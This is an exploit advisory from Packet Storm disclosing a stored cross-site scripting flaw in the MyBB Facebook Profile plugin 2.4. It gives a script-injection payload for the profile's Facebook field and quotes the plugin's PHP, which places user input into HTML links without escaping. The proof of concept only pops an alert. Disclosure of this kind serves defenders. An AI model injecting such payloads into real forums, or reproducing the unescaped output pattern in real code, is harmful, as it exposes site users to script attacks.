MyBB Facebook Profile plugin version 2.4 suffers from a persistent cross site scripting vulnerability.
3b097c11871b6cf5ca13bc88715d08e215a08bdee3fffc396cb40fc0ca2f5733# Exploit Title: MyBB Facebook Profile Plugin Stored XSS
# Date: 12/12/2012
# Exploit Author: limb0
# Vendor Homepage: http://www.collectiontricks.it/
# Software Link: http://mods.mybb.com/view/facebook-profile-link-on-postbit-2-2
# Version: 2.4
# Category:Web Security
# Tested on: Linux
###################################P-XSS######################################
Installation:
1. Upload all folder to your MyBB installation directory.
2. Go to your Admin-CP and click Plugins.
3. Click Install & Activate.
Configuration:
User-CP >> Edit Profile >> Facebook id/nickname >> Type: "><script>alert(/limb0/)</script>
Then visit one of your threads,and voila.
Proofs:
Configuration:http://postimage.org/image/sumvqlro7/
Testing:http://postimage.org/image/57tjltqb9/
-------------------------------Vulnerable Code---------------------------------------
Line 200-216
$post["iconfacebook"] = '<a href="http://www.facebook.com/' .
$post["facebook"] .'" TARGET=_BLANK><img src="'.$mybb->settings['bburl'].'/images/facebook.gif' .'" /></a>';
} else
{
}
} else {
$post["iconfacebook"] = '<a href="http://www.facebook.com/' .
$post["facebook"] .'" TARGET=_BLANK><img src="'.$mybb->settings['bburl'].'/images/facebook.gif' .'" /></a>';
}
}
This vulnerable is dedicated to my brothers. <3
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed